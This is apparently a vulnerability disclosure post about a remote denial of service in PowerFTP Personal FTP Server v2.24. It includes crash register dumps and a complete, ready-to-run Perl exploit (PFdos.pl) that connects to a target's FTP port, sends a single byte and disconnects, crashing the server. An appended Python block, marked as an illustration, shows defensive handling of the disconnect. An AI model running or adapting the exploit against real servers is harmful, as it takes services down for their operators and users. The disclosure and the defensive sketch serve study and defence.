hi
The PowerFTPd is available from vendor Cooolsoft's website:
 http://www.cooolsoft.com
 I found a vulnerability in PowerFTP that allows a remote
user--any user--to shut down the FTP server (tested
 on v2.24).
 I alerted Cooolsoft (05/10/2002) and have not had a
 response until now.
This attack is due to the poor handling of errors
caused by the disconnection of the remote host. I wrote a
Perl script which launches this attack. Afterwards, the
state of the registers is:

Unknown exception - code c0000025 (first chance)
Stack overflow - code c00000fd (first chance)
eax=00033070 ebx=0012ffb4 ecx=0040371c edx=7846f5b5 esi=0003311c edi=00000001
eip=77ea98ca esp=00032d60 ebp=00033050 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
kernel32!UnhandledExceptionFilter+25

and we have this message:


 L exeption Exeption logicielle inconnue (0x0eedfade) s'est
 produite dans l'application a l'emplacement 0x77e7f142

 Exeption EFtpCtrlsocketexeption in module FTPServer.exe at
 00059DE6. Data in buffer , cant change size

 This was tested against PowerFTP Personal FTP Server v2.24

exploit:


#!/usr/bin/perl -w
##
# tool:		PFdos.pl
# author: 	securma@caramail.com
# purpose:	allows a remote user--any user--to shut down the ftp server
# greetz: all friend in marocit and #crack.fr (especially christal)
##

use Socket;
if (not $ARGV[0]) {
	print qq~
 		Usage: pfdos.pl <host>
	~;
exit;}

$ip=$ARGV[0];
print "+++++++++++++++++++++++\n\n";
print "PowerFTP DOS \n\n";
print "by securma massine \n\n";
print "securma\@caramail.com \n\n";
print "+++++++++++++++++++++++\n\n";
print "Sending Exploit Code to host: " . $ip . "\n\n";
sendexplt("A");
sub sendexplt {
 my ($pstr)=@_;
	$target= inet_aton($ip) || die("inet_aton problems");
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
 die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,21,$target)){
 select(S);
		$|=1;
 print $pstr;
 sleep 3;
	 close(S);
 } else { die("Can't connect...\n"); }
}
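
The post attributes the crash to poor error handling when the remote host disconnects. The block below is an added example, not part of the original post and not the vendor's code: it sketches a control-channel reader that treats a disconnect in the middle of a command as an ordinary session end. The names serve_control and replay, the size limit and the timeout are assumptions made for illustration.

```python
import socket

MAX_LINE = 512        # assumed cap on one control-channel command
IDLE_TIMEOUT = 5.0    # assumed seconds to wait for the next bytes


def serve_control(conn):
    """Read CRLF-terminated commands until the peer goes away.

    Returns (commands, reason) and never raises on a peer disconnect.
    """
    commands, buf = [], b""
    conn.settimeout(IDLE_TIMEOUT)
    try:
        while True:
            try:
                chunk = conn.recv(4096)
            except socket.timeout:
                return commands, "timeout"
            except OSError:
                # Reset or other socket failure: same cleanup as a clean close.
                return commands, "reset"
            if not chunk:
                # EOF. Bytes still in buf are an unfinished command:
                # discard them instead of parsing or resizing the buffer.
                return commands, ("closed_mid_command" if buf else "closed")
            buf += chunk
            while b"\r\n" in buf:
                line, buf = buf.split(b"\r\n", 1)
                commands.append(line.decode("latin-1"))
            if len(buf) > MAX_LINE:
                return commands, "line_too_long"
    finally:
        conn.close()  # release this session only; the listener keeps running


def replay(payload):
    """Feed constructed client bytes to serve_control over a local socketpair."""
    client, server = socket.socketpair()
    client.sendall(payload)
    client.close()  # peer disconnects without finishing the command
    return serve_control(server)


if __name__ == "__main__":
    for sample in (b"A", b"USER anonymous\r\nPA", b"QUIT\r\n"):  # constructed inputs
        print(sample, "->", replay(sample))
```
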









